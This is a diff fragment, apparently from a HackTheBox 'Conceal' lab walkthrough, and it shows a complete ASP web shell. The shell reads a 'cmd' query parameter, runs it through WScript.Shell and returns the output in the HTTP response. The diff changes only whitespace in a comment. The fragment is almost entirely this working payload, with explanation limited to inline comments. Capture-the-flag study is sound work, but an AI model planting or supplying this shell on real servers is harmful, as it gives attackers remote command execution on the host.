Anymuz/HackTheBox-Walkthroughs/Conceal/Conceal.md

 <%
 commandInput = Request.QueryString("cmd") ' Take our command to execute.
-set Shell = CreateObject("WScript.Shell") ' Shell object to execute the command with. set CommandExecution = Shell.Exec(commandInput).StdOut ' Execute the command and save the output stream object. outputString = CommandExecution.Readall() ' Read the steam object as a string. response.write outputString ' Output the string that comes of our command execution.
+set Shell = CreateObject("WScript.Shell") ' Shell object to execute the command with. set CommandExecution = Shell.Exec(commandInput).StdOut ' Execute the command and save the output stream object	. outputString = CommandExecution.Readall() ' Read the steam object as a string. response.write outputString ' Output the string that comes of our command execution.
 %>